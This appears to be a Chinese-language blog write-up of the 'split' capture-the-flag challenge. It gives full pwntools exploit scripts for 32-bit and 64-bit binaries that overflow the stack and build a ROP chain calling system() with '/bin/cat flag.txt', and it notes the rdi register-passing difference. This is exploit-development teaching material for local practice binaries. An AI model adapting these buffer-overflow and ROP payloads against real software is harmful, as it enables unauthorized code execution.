split

32位
日常checksec,开了NX


ida,f5,发现溢出点与 ret2win 相同

程序中少了可以直接利用的函数,但可以找到 system() 和字符串 /bin/cat flag.txt
思路:将 /bin/cat flag.txt 作为参数通过栈传入 system() 函数再进行调用
在 ida 中分别找到 system 和 /bin/cat flag.txt 的地址


exp

#!/usr/bin/env python
#-*-coding:utf-8 -*-
from pwn import *

sh = process('./split32')
system = 0x08048657
cat_flag = 0x0804A030
payload = 'A' * 0x28
payload += p32(0)
payload += p32(system)
payload += p32(cat_flag)
sh.sendline(payload)
sh.interactive()

64位
思路与32位一致
在 ida 中分别找到 system 和 /bin/cat flag.txt 的地址



由于是64位程序,传入的第一个参数放在寄存器 rdi 中而不是直接入栈,所以需要通过 ROPgadget 找到 rdi 的地址

ROPgadget --binary split --only 'pop|ret'

exp

#!/usr/bin/env python
#-*-coding:utf-8 -*-
from pwn import *

sh = process('./split')
system = 0x00400810
cat_flag = 0x00601060
pop_rdi = 0x00400883
payload = 'A' * 0x20
payload += p64(0)
payload += p64(pop_rdi)
payload += p64(cat_flag)
payload += p64(system)
sh.sendline(payload)
sh.interactive()

32位程序参数直接入栈
64位程序参数先传入寄存器
64位6个寄存器:rdi, rsi, rdx, rcx, r8, r9

©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容

  • 溢出点与ret2win相同,查看string,elf文件的 plt 表中有system函数,并且文件内有 "/bi...
    Queen_耳又又阅读 368评论 0 0
  • 32 64位和32位的寄存器和汇编的比较 https://www.jianshu.com/p/9ffad98d7a...
    Zero_0_0阅读 483评论 0 0
  • 溢出点还是一样,不过少了可直接利用的函数,但是程序中提供了system函数和字符串"/bin/cat flag.t...
    n0va阅读 394评论 0 0
  • 前言 本文翻译自Assembly Register Calling Convention Tutorial 翻译...
    桃红宿雨阅读 2,897评论 1 9
  • slice()和splice()是作用于数组的(字符串中也有slice);split()、substring()和...
    darkTi阅读 782评论 0 0